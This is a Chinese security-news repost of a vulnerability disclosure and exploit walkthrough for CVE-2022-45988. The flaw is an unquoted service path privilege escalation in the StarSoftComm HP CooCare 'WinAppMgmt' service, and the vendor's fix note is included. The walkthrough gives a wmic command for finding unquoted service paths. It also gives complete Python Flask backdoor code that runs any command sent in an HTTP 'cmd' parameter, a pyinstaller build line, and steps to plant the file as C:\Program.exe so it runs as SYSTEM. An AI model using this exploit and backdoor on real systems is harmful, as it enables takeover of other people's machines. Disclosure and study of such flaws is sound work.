CVE-2022-45988 StarSoftComm HP CooCare 存在特权提升漏洞
2023-3-4 13:45:29 Author: Ots安全(查看原文) 阅读量:54 收藏

################################################## ##

我已经联系了 hp-security-alert 他们已经修复了这个错误。关于 StarSoftComm CooCare [HP-PSRT-IR #4106]

供应商回复了以下信息:

请按照以下步骤更新:

  1. 推出电子服务

  2. 等待约3分钟

  3. 关闭并再次启动 eService。

  4. 检查版本是 v5.364 或更高版本。

#####################################

StarSoftComm HP CooCare 中存在提权漏洞,攻击者可以利用该漏洞提升其特权级别e管家超级版是HP Star14 pro自带的一款远程诊断软件,该软件为StarSoftComm(软件科技)旗下产品

在 windows 11 上测试 22621.819 HP LAPTOP HP Pavilion Plus 14 英寸笔记本电脑 14-eh0000 (56D77AV)

受影响版本:CooCare v5.364 以下

#漏洞复现

#第一步:wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """ 查找服务(使用上记CMD命令找到未引用的服务)

服务名称是 Windows Application Management Service = AKA = WinAppMgmt
服务的名称叫做Windows Application Management Service 简称是WinAppMgmt

该服务来自 StarSoftComm CooCare

#Step 2:准备恶意程序

from flask import Flask, requestimport os
app = Flask(__name__)
@app.route('/')def hello_world(): r = request.args.getlist('cmd') #Reception? cmd= parameter a=os.popen(r[0]) #Execute system commands l = a.read() return l #return
if __name__ == '__main__': app.run(host='0.0.0.0', port=14145, debug=True) #Listen HTTP port 14145

我是用python3 flask写的一个恶意exe,可以监听HTTP 14145端口,执行系统命令。

使用命令 pyinstaller.exe --onefile --windowed -F -w python_test.py 生成恶意 exe。

#Step 3:将恶意软件放入路径C:\并将恶意软件重命名为Program.exe

#Step 4:启动Windows应用管理服务

如果Windows Application Management Service已经启动,您可以重新启动它

#Step 5:等待Windows Application Management Service启动并执行系统命令 C:\Program.exe run as system

当我看到 Windows 应用程序管理服务在 Taskmgr.exe whit SYSTEM 中启动时,然后我可以打开浏览器输入http://127.0.0.1:14145?cmd=whoami

等待..........

项目地址:https://github.com/happy0717/CVE-2022-45988


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247496709&idx=2&sn=ff30ea2c1e481cf0b43678b137cc3d83&chksm=9badbd4eacda34581b86878e881a6fa614c0f6f02740d8c2aedb6a2c5829efe4c2bfba39f150#rd
如有侵权请联系:admin#unsafe.sh